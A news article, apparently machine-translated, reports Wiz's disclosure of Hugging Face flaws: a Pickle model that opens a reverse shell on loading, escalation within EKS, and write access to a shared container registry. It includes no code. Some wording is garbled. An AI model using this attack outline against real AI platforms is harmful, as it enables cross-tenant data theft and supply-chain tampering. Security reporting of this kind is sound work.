Two critical vulnerabilities in the security of the Hugging Face AI platform have opened the door to attackers seeking to access and alter customer data and models.
One of the security weaknesses provided attackers with a way to access machine learning (ML) models belonging to other customers on the Hugging Face platform, while the second allowed them to overwrite all images in a shared container registry. Both flaws, discovered by Wiz researchers, had to do with attackers’ ability to take over parts of Hugging Face’s inference infrastructure.
Wiz researchers found weaknesses in three specific components: Hugging Face’s inference API, which allows users to navigate and interact with models available on the platform; Hugging Face inference endpoint: o Dedicated infrastructure for deploying AI models in production; and Hugging Face Spaces, a hosting service for showcasing AI/ML applications or working collaboratively on model development.
The problem with the pickle
By examining Hugging Face’s infrastructure and ways to weaponize discovered bugs, Wiz researchers found that anyone could easily upload an AI/ML model to the platform, including those based on the Pickle format. Brine is a widely used module for storing Python objects in a file. Although the Python Software Foundation itself has also deemed Pickle insecure, it remains popular due to its ease of use and the familiarity people have with it.
“It is relatively simple to create a PyTorch (Pickle) model that will execute arbitrary code upon loading,” according to Wiz.
Wiz researchers took advantage of the ability to upload a private Pickle-based model to Hugging Face that performed a reverse shell upon upload. They then interacted with it using the Inference API to obtain shell-like functionality, which the researchers used to explore their environment on Hugging Face’s infrastructure.
This exercise quickly showed the researchers that their model was running in a pod in a cluster on Amazon Elastic Kubernetes Service (EKS). From there the researchers were able to exploit common misconfigurations to extract information that allowed them to gain the privileges required to view secrets that could have allowed them to access other tenants on the shared infrastructure.
With Hugging Face Spaces, Wiz discovered that an attacker could execute arbitrary code during the application creation phase that would allow them to examine network connections from their computer. Their analysis highlighted a connection to a shared container registry containing images belonging to other customers that they could have tampered with.
“In the wrong hands, the ability to write to the internal container registry could have significant implications for the integrity of the platform and lead to supply chain attacks on customer spaces,” Wiz said.
He said the hugging face he had completely mitigated the risks Wiz had discovered. The company has meanwhile identified that the issues have to do at least in part with its decision to continue allowing the use of Pickle files on the Hugging Face platform, despite the aforementioned well-documented security risks associated with such files.
“The Pickle files have been the focus of most of the research conducted by Wiz and other recent publications by security researchers on Hugging Face,” the company noted. Allowing the use of Pickle on Hugging Face is “a burden on our engineering and security teams, and we have made significant efforts to mitigate risks by allowing the AI community to use the tools they choose.”
Emerging risks with AI-as-a-Service
Wiz described his discovery as indicative of the risks organizations need to be aware of when using shared infrastructure to host, run and develop new AI models and applications, which is becoming known as “AI-as-a-service.” The company compared the risks and associated mitigations to those organizations encounter in public cloud environments and recommended applying the same mitigations in AI environments as well.
“Organizations should ensure they have visibility and governance of the entire AI stack being used and carefully analyze all risks,” Wiz said in a blog this week. This includes analyzing the usage of malicious models, exposure of training datasensitive data in formation, vulnerability in AI SDKs, exposure of AI services, and other toxic risk combinations that could be exploited by attackers,” the security vendor said.
Eric Schwake, director of cybersecurity strategy at Salt Security, says there are two main issues with using AI as a service that organizations need to be aware of. “First, threat actors can upload malicious AI models or exploit vulnerabilities in the inference stack to steal data or manipulate results,” he says. “Second, malicious actors can attempt to compromise training data, leading to biased or inaccurate AI results, commonly known as data poisoning.”
Identifying these problems can be difficult, especially considering the complexity of AI models, he says. To help manage some of this risk, it’s important for organizations to understand how their apps and AI models interact with the API and find ways to protect it. “Organizations may also want to explore Explainable AI (XAI) “to help make AI models more understandable,” Schwake says, “and could help identify and mitigate biases or risks within AI models.”